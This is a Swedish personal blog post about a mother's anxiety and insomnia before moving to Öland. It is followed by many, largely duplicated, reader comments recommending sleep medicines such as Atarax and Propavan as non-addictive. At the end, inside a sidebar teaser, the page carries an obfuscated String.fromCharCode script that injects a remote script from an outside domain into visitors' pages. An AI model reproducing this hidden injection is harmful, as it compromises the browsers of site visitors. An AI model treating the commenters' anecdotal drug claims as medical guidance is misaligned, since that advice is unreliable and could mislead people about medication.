Förbereder sista kvällen med gänget…

IMG_8681

hej fina!

Sitter i trädgården… Lilleman leker. Jag sitter och funderar…. många tankar just nu. Tvekar konstigt nog. Analyserar mitt beslut. Föröker sätta mig in i hur det kommer att bli när vi ”landat” på Öland. ”Tänk om” jag inte kommer att trivas och landa. ”Tänk om” det blor som förut…. ”tänk om” återupprepad om och om igen… jävla ångest rent ut sagt! 

Vi tog sovmorgon idag. Låg kvar i sängen och tittade på tv till 10:00 ☺️ SKÖNT! Är det sommarlov så är det 😉

Den där stunden  på morgonen när vi bara är och myser är så viktig för oss…

Min sömn är urusel igen, vänder och vrider och vaknar hela tiden… Funderar på att ta hjälp av nån form av sömntablett när Lilleman åkt. Funkar inte sömnen så blir allt annat såååå mycket jobbigare! Jag har dålig erfarenhet av sömntabletter och är livrädd för biverkningar och att bli beroende…

-har du något tips? 

Igår var jag på lunchdejt med Lilleman. En långpromenad längsmed strandpromenaden. En lunch och glass på våfflan. 🍧

IMG_8523 IMG_8527 IMG_8581 IMG_8588

Ludvig har ett favoritträd som han älskar att klättra i. Både på vintern och sommaren ☺️

IMG_8592 IMG_8593 IMG_8597 IMG_8599

Ikväll ska vi ha grillfest i trädgården. Lite som en ”hejdå” avslutning. Grannflickan Isabelle fyller år imorgon, och Ludvig är inte kvar när kalaset är… så nu ska vi handla mat till kvällen, en födelsedagspresent till lilltjejen, och förbereda ”sista kvällen med gänget” .

Det känns tungt, och sorgset. Men just nu så kopplar jag på mitt pokerface och fokuserar på det praktiska inför ikväll. Ludvig är glad och förväntansfull☺️ Han ställer många frågor just nu. Mycket mer än vanligt. Jag försöker att svara positivt, neutralt och med fonus på att allt kommer att bli bra🙏🏻❤️ Nu när han förstår att flytten blir av, att det börjar bli verklighet… så börjar han tveka. Men det är naturligt och jag föröker intala mig själv att detta är rätt. Hur ont det än gör inom mig så föröker jag stanna kvar vid denna tanken. Det är det bästa för Lilleman❤️ Jag ber till Gud att det verkligen är så….. att min tvekan och oro bara är naturligt.

Jag är så skör, ledsen, trött och tung! Helt slut! Men hoppas och bio tro att det känns bättres snart….

MEN, Lilleman är här, han flyger ner imorgon bitti. Fram tills dess är det pokerface on👊🏻❤️

Vi hörs sen…. kram sålänge🌸

/My Martens 

67 Komentarer

 1. Så fina foton. Ja du..tänk om inte fanns. Tänk om man kunde ha svar på allt.
  Försök koppla in ”allt löser sig”. Tid, ge det tid att sjunka in. Inget är hugget i sten.
  Jag vet det är lätt att sitta här o säga, men allt kommer att bli bra.
  Kram ?

 2. Jag känner av din separationångest i hela min kropp. Jag är så ledsen för att ni ska behöva flytta från ett ställe ni trivs så bra på. Men My, det är helt rätt att ni gör det. Även om du inte trivs på Öland i början, så med tiden kommer du att göra det. Du har gjort helt rätt beslut, tveka inte på det.
  Många tröstkramar sänder jag dig.

 3. Vill bara önska er en ljuvlig kväll. Massor av Styrkekramar från en som oxå e fenomenal på pokerface?❤️ Men som du säkert vet, kostar det en massa energi. #KramarOm❤️❤️❤️

 4. Släpp oron. Släpp alla tankar. Det är inte förrän du är där du märker nått. Oroa sig innan är bara jobbigt och ingenting annat. Jag vet, jag är likadan men jag lovar. Släpp tankarna. Allt är bra så länge du får vara med ditt barn. Tänk istället att inte vara med din son. Hur känns det? Just, det. Tusenfalt värre. Där har du svaret.

 5. Hej My. Vill tipsa dig om en tablett som heter atarax. Jag har fått den utskriven för ångestdämpande och sömn. Man blir trött av den, brukar ta den 2 timmar innan söngen så blir jag lugn å somna fort. Enda nackdelen kan vara att man är lite trött dagen efter, men det är man om man inte sover oxå. Det bästa med den är att det inte finns någon beroendeframkallaning med att ta den regelbundet. Den skrivs även ut mot Nässelslag å liknande. Ett grymt tips ?

  • Ja, jag befinner mig i ett kaos just nu… så är det just nu. Jag mår som jag mår, jag känner som jag gör. Förmår inte förmedla annat än min vardag nu. mitt flyttlass går sista helgen denna månad. Jag förslår att du hoppar över bloggen fram tills i mitten på juli… då det kommer vara ett tillfälligt kaos fram tills dess… Om du känner att det blir för mycket ältande för dig. ? Med vänlig hälsning, My

  • Har man inget snällt att säga kan man vara tur! Detta är en en blogg/dagbok. Nu skriver det.hon vill orkar du inte läsa.så sluta!!

 6. Hej
  Ja det är ett rent h*lvete att inte få sova och jag vägrade allt vad sömntabletter heter för jag blir så påverkad av tabletter i allmänt. Men Atarax kan jag rekommendera. Det är en antihistamin egentligen men man använder ”biverkningen” vid sömnbrist. Man får lättare att somna och sover bättre under natten och skulle man vakna så somnar man om lättare och man känner ingenting dagen efter. De är inte beroendeframkallande över huvudtaget. Jag tar en tablett vid 20/21 när jag lägger mig vid 22/23. Funkar super!

 7. Mina tankar är…. Du har ju bott på Öland, så du vet ju vad du återvänder till.
  Trivdes du där då? Jag önskar att jag kunde trösta dig som många andra här,
  om att allt kommer att bli bra, men det är ju bara du själv, som kan svara på det.

 8. sömnmedicin melatonin
  läs mera om det här ;https://sv.wikipedia.org/wiki/Melatonin
  eller här,,,
  https://lakemedelsboken.se/kapitel/psykiatri/somnstorningar.html
  annars finns ju lergigan atarax, propavan, theralen, man kan bli lite ”tung” ikroppen dagen efter men heller det än inte få sova, propavan kan man även få lite myror i benen men det går över om man står ut, alla får det inte…
  Men dessa mediciner är INTE beroende framkallande,
  Kolla med din doktor ♥
  Sömnen är ju jätteviktig, som du skriver…♥♥♥
  stor kram förstår det är tufft för dig My ♥♥♥
  Och DU Marita?? Du Behöver ju inte alls läsa denna blogg om det stör dig? eller känner du dig tvingat att läsa den ??
  Allvarligt?

 9. Hej!
  Vill dela några tankar med dig.
  Ångest enligt bl.a. buddismen kommer när man inte lever i nuet. Dvs grubblar och
  tänker på sådant du inte kan lösa Nu i Stunden.
  Så försök se dig som ett tomt papper. Ägna dina tankar bara åt det som du kan lösa precis Här
  och nu. Såsom tex kalaset,packning och sortering av saker.
  Ge dig själv chansen att släppa taget. Fylla pappret med saker som du precis gör i stunden.
  Meditation är ett väldigt bra hjälpmedel. Kanske inte för dig just precis nu,men senare vid havet på,
  Öland. Vi har alla vår historia och den har betydelse för de val vi gör senare i livet. Hamna inte i fällan av det du har varit i tidigare. (Tidig flytt hemifrån,gles kontakt med föräld/er/rar)
  Var stolt över dig själv,du har gjort det bästa valet för Er Son. Varm Kram

 10. Pascoflair finns på hälsokost el apotek, det är lugnande när man ska sova,jag har även prövat några olika sömntabletter ,det är individuellt vad som fungerar,Jag har svårt att komma in i djup sömn och har mycket mardrömmar, hör med en läkare ang insomningstabletter som inte är beroende framkallade. Jag ska gå kbt med inrikting sömn problem . Jag var utbränd för ca 7 år sen och har haft upp och ner med sömnen sen dess. Jätteviktigt att du får sova, helt rätt att göra det de veckor du ej har sonen. Varm kram

 11. Så fina foton. Ja du..tänk om inte fanns. Tänk om man kunde ha svar på allt.
  Försök koppla in ”allt löser sig”. Tid, ge det tid att sjunka in. Inget är hugget i sten.
  Jag vet det är lätt att sitta här o säga, men allt kommer att bli bra.
  Kram 💖

 12. Antihistamin dvs. allergimedicin (tabletter) av typen Atarax som nämns ovan kan användas vid sömnproblem och är inte beroendeframkallande.
  Det kommer att bli bra, men jag förstår att det är kaos just nu.
  Kram!

 13. Vet hur det känns, den där känslan av att bo på en plats där man inte hör hemma. Där det hänt saker som gjort att folk pratar om en, av olika anledningar men mest av avund. Och den stämpeln är omöjlig att tvätta bort, den är förevigt tatuerad i pannan.
  Jag bor kvar på den platsen (inte så långt från Öland) den som jag mår så himla dåligt av o som gör att jag vissa dagar inte pallar gå ut.
  Jag hatar den, men vart ska man flytta? Det är ju inte bara att dra härifrån. Jobb, lägenhet osv. Men om jag hade flyttat till en plats där jag trivts, där själen funnit ro o sen varit tvungen att flytta tillbaka…shit vilken mardröm. Det är där jag känner med dig, My – o jag känner din ångest o alla helvetes kval du går igenom. Jag lider med dig som fan.
  Jag tror att människor som sticker ut (både du o jag gör det) ska inte bo på små orter, vi behöver smälta in o bli respekterade för dem vi är i större städer. Eller nåt.
  Men det där tipsen du fått om Atarax – toppenbra tablett, inte klassad som psykofarmaca utan egentligen som allergimedicin men den är lugnande. När jag tar en så gör jag det vid 19.30 annars blir jag ”bakis” o trött dagen efter o det funkar inte för mig. Men absolut ska du testa den.
  Ja vad säger man som avslutning på detta. Jag vet inte…
  Ta hand om Dig o sonen o ta en stund i taget.
  /S

 14. Jag känner av din separationångest i hela min kropp. Jag är så ledsen för att ni ska behöva flytta från ett ställe ni trivs så bra på. Men My, det är helt rätt att ni gör det. Även om du inte trivs på Öland i början, så med tiden kommer du att göra det. Du har gjort helt rätt beslut, tveka inte på det.
  Många tröstkramar sänder jag dig.

 15. Vill bara önska er en ljuvlig kväll. Massor av Styrkekramar från en som oxå e fenomenal på pokerface👍❤️ Men som du säkert vet, kostar det en massa energi. #KramarOm❤️❤️❤️

 16. Släpp oron. Släpp alla tankar. Det är inte förrän du är där du märker nått. Oroa sig innan är bara jobbigt och ingenting annat. Jag vet, jag är likadan men jag lovar. Släpp tankarna. Allt är bra så länge du får vara med ditt barn. Tänk istället att inte vara med din son. Hur känns det? Just, det. Tusenfalt värre. Där har du svaret.

 17. Hej My. Vill tipsa dig om en tablett som heter atarax. Jag har fått den utskriven för ångestdämpande och sömn. Man blir trött av den, brukar ta den 2 timmar innan söngen så blir jag lugn å somna fort. Enda nackdelen kan vara att man är lite trött dagen efter, men det är man om man inte sover oxå. Det bästa med den är att det inte finns någon beroendeframkallaning med att ta den regelbundet. Den skrivs även ut mot Nässelslag å liknande. Ett grymt tips 🙂

  • Ja, jag befinner mig i ett kaos just nu… så är det just nu. Jag mår som jag mår, jag känner som jag gör. Förmår inte förmedla annat än min vardag nu. mitt flyttlass går sista helgen denna månad. Jag förslår att du hoppar över bloggen fram tills i mitten på juli… då det kommer vara ett tillfälligt kaos fram tills dess… Om du känner att det blir för mycket ältande för dig. 🌸 Med vänlig hälsning, My

  • Har man inget snällt att säga kan man vara tur! Detta är en en blogg/dagbok. Nu skriver det.hon vill orkar du inte läsa.så sluta!!

 18. Hej

  Ja det är ett rent h*lvete att inte få sova och jag vägrade allt vad sömntabletter heter för jag blir så påverkad av tabletter i allmänt. Men Atarax kan jag rekommendera. Det är en antihistamin egentligen men man använder ”biverkningen” vid sömnbrist. Man får lättare att somna och sover bättre under natten och skulle man vakna så somnar man om lättare och man känner ingenting dagen efter. De är inte beroendeframkallande över huvudtaget. Jag tar en tablett vid 20/21 när jag lägger mig vid 22/23. Funkar super!

 19. Mina tankar är…. Du har ju bott på Öland, så du vet ju vad du återvänder till.
  Trivdes du där då? Jag önskar att jag kunde trösta dig som många andra här,
  om att allt kommer att bli bra, men det är ju bara du själv, som kan svara på det.

 20. sömnmedicin melatonin

  läs mera om det här ;https://sv.wikipedia.org/wiki/Melatonin

  eller här,,,
  https://lakemedelsboken.se/kapitel/psykiatri/somnstorningar.html

  annars finns ju lergigan atarax, propavan, theralen, man kan bli lite ”tung” ikroppen dagen efter men heller det än inte få sova, propavan kan man även få lite myror i benen men det går över om man står ut, alla får det inte…

  Men dessa mediciner är INTE beroende framkallande,
  Kolla med din doktor ♥
  Sömnen är ju jätteviktig, som du skriver…♥♥♥
  stor kram förstår det är tufft för dig My ♥♥♥

  Och DU Marita?? Du Behöver ju inte alls läsa denna blogg om det stör dig? eller känner du dig tvingat att läsa den ??
  Allvarligt?

 21. Hej!
  Vill dela några tankar med dig.
  Ångest enligt bl.a. buddismen kommer när man inte lever i nuet. Dvs grubblar och
  tänker på sådant du inte kan lösa Nu i Stunden.
  Så försök se dig som ett tomt papper. Ägna dina tankar bara åt det som du kan lösa precis Här
  och nu. Såsom tex kalaset,packning och sortering av saker.
  Ge dig själv chansen att släppa taget. Fylla pappret med saker som du precis gör i stunden.
  Meditation är ett väldigt bra hjälpmedel. Kanske inte för dig just precis nu,men senare vid havet på,
  Öland. Vi har alla vår historia och den har betydelse för de val vi gör senare i livet. Hamna inte i fällan av det du har varit i tidigare. (Tidig flytt hemifrån,gles kontakt med föräld/er/rar)
  Var stolt över dig själv,du har gjort det bästa valet för Er Son. Varm Kram

 22. Pascoflair finns på hälsokost el apotek, det är lugnande när man ska sova,jag har även prövat några olika sömntabletter ,det är individuellt vad som fungerar,Jag har svårt att komma in i djup sömn och har mycket mardrömmar, hör med en läkare ang insomningstabletter som inte är beroende framkallade. Jag ska gå kbt med inrikting sömn problem . Jag var utbränd för ca 7 år sen och har haft upp och ner med sömnen sen dess. Jätteviktigt att du får sova, helt rätt att göra det de veckor du ej har sonen. Varm kram

 23. Hej rekommenderar som några andra här, be att få atarax. Lugnar och man blir trött. Kram och lycka till i framtiden.

 24. Antihistamin dvs. allergimedicin (tabletter) av typen Atarax som nämns ovan kan användas vid sömnproblem och är inte beroendeframkallande.

  Det kommer att bli bra, men jag förstår att det är kaos just nu.

  Kram!

 25. Vet hur det känns, den där känslan av att bo på en plats där man inte hör hemma. Där det hänt saker som gjort att folk pratar om en, av olika anledningar men mest av avund. Och den stämpeln är omöjlig att tvätta bort, den är förevigt tatuerad i pannan.
  Jag bor kvar på den platsen (inte så långt från Öland) den som jag mår så himla dåligt av o som gör att jag vissa dagar inte pallar gå ut.
  Jag hatar den, men vart ska man flytta? Det är ju inte bara att dra härifrån. Jobb, lägenhet osv. Men om jag hade flyttat till en plats där jag trivts, där själen funnit ro o sen varit tvungen att flytta tillbaka…shit vilken mardröm. Det är där jag känner med dig, My – o jag känner din ångest o alla helvetes kval du går igenom. Jag lider med dig som fan.

  Jag tror att människor som sticker ut (både du o jag gör det) ska inte bo på små orter, vi behöver smälta in o bli respekterade för dem vi är i större städer. Eller nåt.

  Men det där tipsen du fått om Atarax – toppenbra tablett, inte klassad som psykofarmaca utan egentligen som allergimedicin men den är lugnande. När jag tar en så gör jag det vid 19.30 annars blir jag ”bakis” o trött dagen efter o det funkar inte för mig. Men absolut ska du testa den.

  Ja vad säger man som avslutning på detta. Jag vet inte…

  Ta hand om Dig o sonen o ta en stund i taget.

  /S

 26. Känner med dig My, du vänder ut och in på dig själv och man vill hjälpa dig men vet inte hur. En dag i taget är mitt bästa råd och jag håller med om att Atarax är bra. Kram

 27. Jag vet exakt hur det är att inte kunna sova. Haft sömnsvårigheter i flera år. Fått insomningstabletter , varit på sömnlabb för utredning osv. Eftersom insomningstabletter är vanebildande så fick jag i höstas prova Propavan, tar 2 ca en timme innan jag lägger mej. Fick på Apoteket ett råd att tugga dessa när jag tar dom. Går fortare ur kroppen o man slipper känna sig dåsig dagen efter. Har blivit betydligt bättre o sover så mycket bättre de flesta nätter. Så kan varmt rekommendera dessa. Lycka till med allt:)

  • Jag instämmer med Sara. Om inte insomning är ditt största problem utan att du sover oroligt och vaknar tidigt är propavan bra. Har hjälpt mig jättemycket efter många många år av sömnproblem. Inte beroendeframkallande.

 28. Ja My det finns säkert tabletter som är bra och hjälper. Men längre fram behöver du slappna av och somna utan sådana hjälpmedel. Finns mycket i växtriket som hjälper men du får söka själv.
  Jag förstår dina tankar och oro inför flytten och hur det blir sedan. Men du har säkert en härlig plats på Öland som du kan åka till och bara vara. Det är viktigt.
  Finns så många ställen där men det ska vara din personliga favoritplats. Jag har flera där . Det är något som jag alltid letar upp. Var kan jag koppla av och bara njuta och vara. Inget stör mig och jag fyller på min energi.
  Kram L

 29. Känner med dig My, du vänder ut och in på dig själv och man vill hjälpa dig men vet inte hur. En dag i taget är mitt bästa råd och jag håller med om att Atarax är bra. Kram

 30. My du är i kris o försöker passa in i en mall som inte fungerar för dig just nu. Förstår att du nästan är rädd för vad som händer med dig nu o om några veckor.
  Jag förstår såväl hur du känner. Du vill inte flytta m hjärtat men måste flytta m hjärnan för Ludvigs skull. Tror allt svek du varit utsatt för kommer ifatt dig nu o det är tufft att hantera. Men flytta nu o känn efter om du kan klara av att bo på Öland några år, så är du så välkommen tillbaka till Sigtuna när Ludvig är lite äldre o ni kan ha ett annat gemensamt liv på denna fina plats.
  Jag tycker du varit utsatt för tillräckligt mycket svek i ditt unga luv.
  Kram från en farmor?

 31. Jag vet exakt hur det är att inte kunna sova. Haft sömnsvårigheter i flera år. Fått insomningstabletter , varit på sömnlabb för utredning osv. Eftersom insomningstabletter är vanebildande så fick jag i höstas prova Propavan, tar 2 ca en timme innan jag lägger mej. Fick på Apoteket ett råd att tugga dessa när jag tar dom. Går fortare ur kroppen o man slipper känna sig dåsig dagen efter. Har blivit betydligt bättre o sover så mycket bättre de flesta nätter. Så kan varmt rekommendera dessa. Lycka till med allt:)

  • Jag instämmer med Sara. Om inte insomning är ditt största problem utan att du sover oroligt och vaknar tidigt är propavan bra. Har hjälpt mig jättemycket efter många många år av sömnproblem. Inte beroendeframkallande.

 32. Tipsar igen om kroppiobalsns.se
  B5,B6, zink & magnesium i terapeutisk dos har hjälpt två nära släktingar till mig med sömn & ångest.

 33. Hej!
  Hoppas flytt o jobb blir bra!
  Är det den killen Gabbe på gymmet du menar som du är sviken av?
  Hoppas du hittar ditt drömjobb på Öland/ Kalmar så du slipper pendla så mycket.
  Kramar

 34. Ja My det finns säkert tabletter som är bra och hjälper. Men längre fram behöver du slappna av och somna utan sådana hjälpmedel. Finns mycket i växtriket som hjälper men du får söka själv.
  Jag förstår dina tankar och oro inför flytten och hur det blir sedan. Men du har säkert en härlig plats på Öland som du kan åka till och bara vara. Det är viktigt.
  Finns så många ställen där men det ska vara din personliga favoritplats. Jag har flera där . Det är något som jag alltid letar upp. Var kan jag koppla av och bara njuta och vara. Inget stör mig och jag fyller på min energi.
  Kram L

 35. Sök valerina forte på apotea.mot oro och ångest och ro i kroppennförmbättre sömn.Finns starkare dos för just sömn. Jag lovar de Funkar. Inget beroende framkallande. Lova mig att prova. ?

 36. My du är i kris o försöker passa in i en mall som inte fungerar för dig just nu. Förstår att du nästan är rädd för vad som händer med dig nu o om några veckor.
  Jag förstår såväl hur du känner. Du vill inte flytta m hjärtat men måste flytta m hjärnan för Ludvigs skull. Tror allt svek du varit utsatt för kommer ifatt dig nu o det är tufft att hantera. Men flytta nu o känn efter om du kan klara av att bo på Öland några år, så är du så välkommen tillbaka till Sigtuna när Ludvig är lite äldre o ni kan ha ett annat gemensamt liv på denna fina plats.
  Jag tycker du varit utsatt för tillräckligt mycket svek i ditt unga luv.
  Kram från en farmor💗

 37. Tipsar igen om kroppiobalsns.se
  B5,B6, zink & magnesium i terapeutisk dos har hjälpt två nära släktingar till mig med sömn & ångest.

 38. Hej!
  Hoppas flytt o jobb blir bra!
  Är det den killen Gabbe på gymmet du menar som du är sviken av?
  Hoppas du hittar ditt drömjobb på Öland/ Kalmar så du slipper pendla så mycket.
  Kramar

 39. Sök valerina forte på apotea.mot oro och ångest och ro i kroppennförmbättre sömn.Finns starkare dos för just sömn. Jag lovar de Funkar. Inget beroende framkallande. Lova mig att prova. 💖

 40. Lycka till med allt och hoppas det blir bra för er båda. Har inte förstått riktigt men ska du ha kvar ditt boende i Sigtuna och vara där när du inte har Ludvig, kram.

 41. Lycka till med allt och hoppas det blir bra för er båda. Har inte förstått riktigt men ska du ha kvar ditt boende i Sigtuna och vara där när du inte har Ludvig, kram.

 42. Liksom alla läkemedel kan detta läkemedel orsaka biverkningar men alla användare behöver inte få dem.
  Vanliga (förekommer hos fler än 1 av 100 användare): Muntorrhet, bitter/metallisk smak i munnen (ofta övergående). Dåsighet, som är beroende av dosens storlek.
  Mindre vanliga (förekommer hos färre än 1 av 100 användare): Huvudvärk, mardrömmar, illamående, oro, yrsel.
  Sällsynta (förekommer hos färre än 1 av 1000 användare): Sömngång, ångest, aggressivitet, opassande beteende som eventuellt är associerat med minnesluckor, förvirring, irritation, koncentrationssvårigheter, minnesluckor, hallucinationer. Magbesvär (dyspepsi). Hudutslag, klåda, nässelfeber. Allvarliga allergiska reaktioner.
  Påverkan på leverenzymer.
  Alkohol bör undvikas när du använder Imovane eftersom alkohol kan förstärka effekten av Imovane. Effekten kan kvarstå till nästkommande morgon vilket kan inverka negativt på din förmåga att köra bil eller hantera maskiner.
  / Kram Daniel

 43. Liksom alla läkemedel kan detta läkemedel orsaka biverkningar men alla användare behöver inte få dem.

  Vanliga (förekommer hos fler än 1 av 100 användare): Muntorrhet, bitter/metallisk smak i munnen (ofta övergående). Dåsighet, som är beroende av dosens storlek.
  Mindre vanliga (förekommer hos färre än 1 av 100 användare): Huvudvärk, mardrömmar, illamående, oro, yrsel.
  Sällsynta (förekommer hos färre än 1 av 1000 användare): Sömngång, ångest, aggressivitet, opassande beteende som eventuellt är associerat med minnesluckor, förvirring, irritation, koncentrationssvårigheter, minnesluckor, hallucinationer. Magbesvär (dyspepsi). Hudutslag, klåda, nässelfeber. Allvarliga allergiska reaktioner.
  Påverkan på leverenzymer.

  Alkohol bör undvikas när du använder Imovane eftersom alkohol kan förstärka effekten av Imovane. Effekten kan kvarstå till nästkommande morgon vilket kan inverka negativt på din förmåga att köra bil eller hantera maskiner.

  / Kram Daniel

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/